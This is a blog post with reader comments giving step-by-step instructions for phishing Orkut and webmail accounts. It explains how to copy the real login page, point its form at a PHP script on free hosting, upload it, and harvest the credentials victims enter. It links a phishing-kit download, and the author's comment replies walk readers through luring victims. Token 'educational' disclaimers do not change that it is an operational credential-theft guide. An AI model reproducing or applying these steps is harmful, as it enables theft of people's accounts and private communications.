Hack Orkut, Gmail, Yahoo Mail

Well, I believe that you will not misuse this article. Better use it for defending yourself.

There was a time when serious vulnerabilities used to exist in the servers which led to their exploitation and further leakage of login credentials. But the technology has advanced and this hack is confined basically to 2-3 methods which I believe is not so sexy if i may say. It takes a bit of social engineering, a bit of phishing and a few Gray cells. Normally, email hacks occur due to lack of experience and knowledge of the victim. The methods followed are :

1.  Fake Login Pages / Phishing

2. Trojan / keyloggers.

Fake Login Page

I am using Orkut as the example. The process is almost similar for yahoo mail etc…

First step is to create an account on any free web space provider, like http://110mb.com or http://20m.com. after you sign in , you will get a URL like:    http://username.110mb.com where username is your preferred username. Be sure your host supports PHP. 110mb.com supports PHP, unsure about 20m.com. Now, if know a bit php coding, code a login script for you and save it as login.php, even if you don’t know PHP coding you can get the login script  by googling. Still, if you don’t get it ASK FOR IT.                                                                                     You may want to try PhishCreate v2.    Download it from :

http://www.mediafire.com/download.php?mnzgzzgxhid

Now,  Fire up your browser and load orkut.com , Save the page as html and open the saved page in a text editor. Search for :

action=https://www.google.com/accounts/ServiceLoginAuth?service=orkut

replace it with action=http://username.110mb.com/login.php and save the page as html say orkut.html.

Now, upload  orkut.html and login.php  on your newly created website:    “http://username.110mb.com.   Now, try visiting    http://username.110mb.com/orkut.html and you will be greeted with a similar looking orkut login page. Input the credentials and login to your control panel of your website, you will find a new html file having the username and password.

Evil is to spread                    http://username.110mb.com/orkut.html and gather credentials. Please don’t.

One important thing is your account on 110mb.com could get deleted within hours since 110mb.com is smart in detecting fake login scripts. I am unsure about 20m.com.  SCREEN SHOTS :

110mb.com account

Now, Click file manager. The screen you would get is :

Inbox

Now, Click on Upload files. You will be presented this screen :

Upload files

Click on Browse and upload the proper files. You may use all the three boxes to upload three different files.

See, the whole action is simple, you just need to guide the victim to login his credentials into your web page. The article is strictly for educational purpose.

Will cover the second method later , may be in next post !

Advertisements

45 thoughts on “Hack Orkut, Gmail, Yahoo Mail

  1. Hi,
    I am currently using orkut and facebook i always choose orkut as my regular usage..
    Because orkut was really nice social site and this article giving me info about orkut so i really like it..

  2. the information is correct but i cudnt understand the below………..cn anyone plz explain it clearly?

    Now, upload orkut.html and login.php on your newly created website: “http://username.110mb.com“. Now, try visiting http://username.110mb.com/orkut.html and you will be greeted with a similar looking orkut login page. Input the credentials and login to your control panel of your website, you will find a new html file having the username and password.

    Evil is to spread http://username.110mb.com/orkut.html and gather credentials. Please don’t.

    1. after editing orkut.html as explained, you need to upload the file on your newly created website. also , you need to upload login.php .
      After uploading, you can guide your victim to access
      http://username.110mb.com/orkut.html
      If u have created your account by ur name,say, navin, the URL to your account wud be :
      navin.110mb.com
      the url that your victim needs to visit is :
      http://navin.110mb.com/orkut.html

      When the victim enters his/her orkut username/password . a new file gets created containing the username and password of the victim, you can access that file from the control panel of your website.
      Regarding login.php file you can search it on google or use Phish Create v2,
      get it from:
      http://www.mediafire.com/download.php?mnzgzzgxhid

      1. i hav downloaded phish create but in tht its asking the url and all………..so wich url v need to paste thr……..if u have tym cn u plz shw sme screen shots like u did above…thanku

    1. Thanx for the encouragement , btw i tried opening my website in opera and it worked perfectly fine, in fact i am replying to your comment using Opera itself.
      Try installing the latest version.

  3. Lots of of bloggers aren’t really pleased with this new iPad.There was just 2 much hoopla about it and alot people got turned off.Thing is, I actually see lots of the awesome potential of the gadget. Third-party soft for making tunes, games, papers and magazines and books, tons of good stuff, but they just didn’t really sell it properly (aside from the books). It smells kinda undercooked

  4. i got stuck in 2 situtions when it ask to create login script and when it ask to edit saved html page in text editor.

    plz help me…

  5. when i open the page ”http://anshul0000006.110mb.com/orkut.html”

    my id is-anshul0000006 it autometically directs me to this page “https://www.numisnetwork.com/premier” instead of similar orkut page

    i think i made a mistake in making login script…..i tried both download links provided by you for login script but both (rapidshare and another one) didn’t worked….and even rapid share link is removed..

    help me

    1. See, it is just simple php programming, if u know php programming u can make a login page with ease… anyway, try searching google for “orkut fake login php” . I am positive you will find wat u want.. still if u don’t get it..lemme know..
      Regarding page upload on 110mb reread my post..

  6. It works ,but I need to know how do jou link person to jor fake page.

    You need to send him/her on email sometnihing in atachmend or what?

    Help plis

  7. excellent issues altogether, you just gained a new reader. What would you suggest about your publish that you simply made some days ago? Any certain?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s